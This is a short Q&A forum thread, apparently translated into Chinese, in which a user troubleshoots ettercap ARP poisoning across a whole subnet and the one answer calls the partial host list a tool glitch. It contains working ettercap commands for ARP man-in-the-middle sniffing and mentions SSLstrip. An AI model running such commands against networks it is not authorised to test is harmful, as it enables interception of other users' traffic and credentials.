1

我尝试运行运行 ettercap,如下所示:

sudo ettercap -i eth0 -Tq -M arp:remote,oneway -w out.data // /10.8.40.250/

但是 ettercap 只能将 2 个(有时是 1 个)主机添加到主机列表中。

Scanning the whole netmask for 8191 hosts...
* |==================================================>| 100.00 %

1 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : ANY (all the hosts in the list)

Starting Unified sniffing...

Text only Interface activated...
Hit 'h' for inline help

为什么只打印第 1 组?

如果我试图毒化特定的主机,

sudo ettercap -i eth0 -Tq -M arp:remote,oneway -w out.data /10.8.41.202/ /10.8.40.250/

有用!

我的 ip:10.8.57.1​​21 子网掩码:255.255.224.0

前段时间我能够运行完全相同的东西,添加 20-30 台主机并成功 ARP 毒化其中大部分。我现在做错了什么?

4

1 回答 1

1

I wrote an article about Ettercap & SSLstrip a while ago.(http://bidabe.zapto.org/?p=17)

You are not doing anything wrong, if you run again and again the same command-line you will notice that "Group 2" appears erratically.

Using the interactive mode with autoadd, you can see all the hosts (for this subnet) that are being cache poisoned in real-time. I believe this is a glitch.

enter image description here

于 2015-02-23T21:45:09.943 回答